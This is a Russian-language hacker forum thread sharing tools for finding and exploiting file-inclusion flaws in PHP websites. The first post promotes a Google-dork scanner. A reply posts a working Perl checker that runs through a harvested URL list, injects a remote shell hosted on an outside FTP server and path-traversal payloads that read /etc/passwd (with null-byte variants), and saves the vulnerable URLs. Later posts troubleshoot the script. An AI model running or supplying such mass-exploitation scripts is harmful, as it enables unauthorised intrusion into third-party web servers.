Google Remote File Inclusion Scanner

​

Как пользоваться:

Заливаем скрипт на сервак и запускаем.

1.Variable: Здесь Вы должны ввести переменную которую вы хотите искать
Например : page= , pag= , q= , a= , n= и тд.
2. Google page: тут предлагаю писать 0, это даст возможность посмотреть результатов.
3. Search string: сюда мы пишем только запросы ввиде allinurl:".php?a=" .htm заменить на .php?a=

Скачать:

• Letitbit
• Deposit
• Rapidshare
• Dump
• Slil

(c) secnull​

 

писал подобную херь на перле, где то на винте валяется, только под icq.com, а не гугл

 

Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)

 

Как я понял, для поиска сайтов, с возможной уязвимотью php-inj. Тоже самое можно сделать просто поиском в гугле, запросом
allinurl:".php?page="

 

может конечно глупый вопрос но тулза чекает инклуды после нахождения большой базы
Спайдер
давай выкладывай свой супер мего скриптег =) хочеться глянуть возможно даже в ЛС

 

satana8920, оказалось что не совсем то же самое, вобщем вот код

Code:

#!perl
use LWP
$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата
$rshell = 'ftp://omfg0o:[email protected]/antichat.php?.html'; # Удалённый инклуд, поменять на своё значение
$lshell = '/../../../../../../../../../../../../../../../../../../../../etc/passwd'; # Локальный инклуд
$timeout = 15;
$var = "$ARGV[0]";
open (LIST, "$list") or die $!;
open (RES, ">$res") or die $!;
while (<LIST>) {
	$_=~ /$var/;
	$url = "$`"."$var"."="."$rshell";
	print "Now checking : $url\n";
	$agent = LWP::UserAgent->new();
	$agent -> timeout($timeout);
	$req = HTTP::Request->new(GET => $url);
	$resp = $agent->request($req);
	$body = $resp->content;
	
	if ($body =~ m/ANTICHAT/) {
		print RES "$url\n";
	}
	$url = "$`"."$var"."="."$lshell";
	print "Now checking : $url\n";
	$req = HTTP::Request->new(GET => $url);
	$resp = $agent->request($req);
	$body = $resp->content;
	
	if ($body =~ m/root:x:0:0/) {
		print RES "$url\n";
	} else {
	$url = "$`"."$var"."="."$lshell".'%00';
	print "Now checking : $url\n";
	$req = HTTP::Request->new(GET => $url);
	$resp = $agent->request($req);
	$body = $resp->content;
	
	if ($body =~ m/root:x:0:0/) {
		print RES "$url\n";
	}
	}
}

Вобщем это чекер локальных и удалённых инклудов, работает он с файлом ссылок. Получить этот файл ссылок можно каким нить гугл грабером или моей тузлой для icq.com
https://forum.antichat.ru/thread56927.html

работоспособность этих двух скриптов не гарантирую, если чё пиши в пм =)

 

посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то

 

тоже самое(((

 

код почитайте

$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата

 

и вообще почитайте мой пост

 

так как у мну лежит все в одной папке у меня это так выглЯдит:
$list = "parse.txt"; # Путь к файлу с сылками
$res = "res.txt"; # Путь к сохранению результата